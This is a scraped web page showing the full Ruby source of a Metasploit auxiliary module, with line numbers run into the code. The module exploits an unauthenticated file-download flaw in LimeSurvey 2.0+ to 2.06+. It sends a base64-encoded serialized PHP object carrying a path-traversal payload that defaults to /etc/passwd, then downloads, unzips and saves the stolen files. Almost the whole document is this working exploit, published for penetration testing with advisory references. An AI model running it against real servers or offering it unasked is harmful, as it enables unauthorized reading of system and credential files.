Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/admin/http/limesurvey_file_download.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45# for extracting files6require 'zip'78class MetasploitModule < Msf::Auxiliary9include Msf::Auxiliary::Report10include Msf::Exploit::Remote::HttpClient1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Limesurvey Unauthenticated File Download',17'Description' => %q{18This module exploits an unauthenticated file download vulnerability19in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded20as a ZIP and unzipped automatically, thus binary files can be downloaded.21},22'Author' => [23'Pichaya Morimoto', # Vulnerability Discovery24'Christian Mehlmauer' # Metasploit module25],26'License' => MSF_LICENSE,27'References' => [28['URL', 'https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/'],29['URL', 'https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015'],30['URL', 'https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1']31],32'DisclosureDate' => '2015-10-12'33)34)3536register_options(37[38Opt::RPORT(80),39OptString.new('TARGETURI', [true, 'The base path to the limesurvey installation', '/']),40OptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),41OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 15])42]43)44end4546def filepath47datastore['FILEPATH']48end4950def traversal_depth51datastore['TRAVERSAL_DEPTH']52end5354def payload55traversal = '/..' * traversal_depth56file = "#{traversal}#{filepath}"57serialized = 'a:1:{i:0;O:16:"CMultiFileUpload":1:{s:4:"file";s:' + file.length.to_s + ':"' + file + '";}}'58Rex::Text.encode_base64(serialized)59end6061def unzip_file(zipfile)62zip_data = Hash.new63begin64Zip::File.open_buffer(zipfile) do |filezip|65filezip.each do |entry|66zip_data[::File.expand_path(entry.name)] = filezip.read(entry)67end68end69rescue Zip::Error => e70print_error("Error extracting ZIP: #{e}")71end72return zip_data73end7475def run76csrf_token = Rex::Text.rand_text_alpha(10)7778vars_post = {79'YII_CSRF_TOKEN' => csrf_token,80'destinationBuild' => Rex::Text.rand_text_alpha(5),81'datasupdateinfo' => payload82}8384res = send_request_cgi({85'method' => 'POST',86'uri' => normalize_uri(target_uri, 'index.php', 'admin', 'update', 'sa', 'backup'),87'cookie' => "YII_CSRF_TOKEN=#{csrf_token}",88'vars_post' => vars_post89})9091if res && res.code == 200 && res.body && res.body.include?('Download this file')92match = res.body.match(%r{<div class="updater-background">\s+<p class="success " style="text-align: left;">\s+<strong>[^<]+</strong>\s+<br/>\s+([^<]+)<br/>\s+<a class="btn btn-success" href="([^"]+)" title="Download this file">Download this file</a>})93if match94local_path = match[1]95download_url = match[2]96print_status("File saved to #{local_path}")97print_status("Downloading backup from URL #{download_url}")9899res = send_request_cgi({100'method' => 'GET',101'uri' => download_url102})103104if res && res.code == 200105unzipped = unzip_file(res.body)106107unzipped.each do |filename, content|108print_good("Filename: #{filename}")109print_good(content)110111path = store_loot(112'limesurvey.http',113'application/octet-stream',114rhost,115content,116filename117)118print_good("File saved in: #{path}")119end120else121print_error('Failed to download file')122end123else124print_error('Failed to download file')125end126else127print_error('Failed to download file')128end129end130end131132133